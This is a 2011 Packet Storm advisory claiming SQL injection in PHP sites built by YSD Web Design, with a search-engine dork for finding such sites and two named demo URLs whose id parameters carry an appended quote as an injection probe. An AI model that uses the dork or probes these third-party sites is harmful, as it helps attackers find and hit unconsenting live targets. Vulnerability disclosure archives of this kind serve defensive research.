YSD Web Design SQL Injection

2011-11-20T00:00:00
ID PACKETSTORM:107156
Type packetstorm
Reporter 3spi0n
Modified 2011-11-20T00:00:00

Description

                                        
                                            `# Exploit Title: Ysd Web Design Sql Injection Vulnerability  
# Date: 20/11/2011 - 03:18  
# Author: 3spi0n  
# Software Website: http://www.ysd.hk/  
# Tested On: BackTrack 5 - Win7 Ultimate  
# Platform: Php  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
[$] Vulnerable File: Changer  
  
[$] Dorks: "Designed by YSD"  
  
[$] Demo Sites:  
  
[~] http://www.business-ecard.com/ecard_popup.php?id=645" [PhpSQLi]  
[~] http://www.stevensus.com.hk/product_list.php?category_id=48&id=87"  
[PhpSQLi]  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
# Artýk Yansýn Bu Dünya, Umrumda Deðil !  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
# Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne  
  
# Greetz: DarkDevilz.in - 3spi0n.net  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
Mr.PaPaRoSSe Black_Umo ALEXTRAX Y2J ZyX x-Leader  
Legend Coder DARKCOD3R Santiq0 53rh4t PerS ExDeaTH  
  
[And DD'z Family]  
  
[DarkDevilz - Defence And Destruction Group'z - TURKEY]  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
`